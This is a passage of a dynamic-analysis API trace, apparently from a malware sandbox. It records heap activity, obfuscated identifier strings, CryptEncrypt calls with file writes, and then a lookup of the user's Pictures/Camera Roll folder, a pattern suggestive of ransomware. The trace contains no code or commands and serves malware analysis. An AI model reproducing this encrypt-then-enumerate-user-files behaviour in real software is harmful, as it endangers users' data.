(HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.154] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.155] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0209.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0209.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0209.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0209.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0209.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0209.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0209.157] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0209.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0209.157] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0209.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.160] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0209.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.161] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0209.161] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0209.161] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.161] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.161] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab3c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.161] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71d68*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71d68*, pdwDataLen=0x8cef60*=0x8) returned 1 [0209.161] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.161] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.161] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.163] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.163] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.163] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.163] WriteFile (in: hFile=0x524, lpBuffer=0x2a71ac8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71ac8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0209.164] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0209.164] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0209.164] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.164] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab038, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0209.164] CryptDestroyKey (hKey=0x9e2138) returned 1 [0209.164] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.164] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.164] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.164] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.164] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.164] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.164] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.164] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.164] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.164] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.164] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.165] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.165] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.165] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.165] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.165] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.165] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7040, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0209.165] CryptReleaseContext (hProv=0xa7bc48, dwFlags=0x0) returned 1 [0209.165] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.165] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.165] FreeLibrary (hLibModule=0x76390000) returned 1 [0209.165] CloseHandle (hObject=0x524) returned 1 [0209.166] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.166] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.166] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Camera Roll", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", 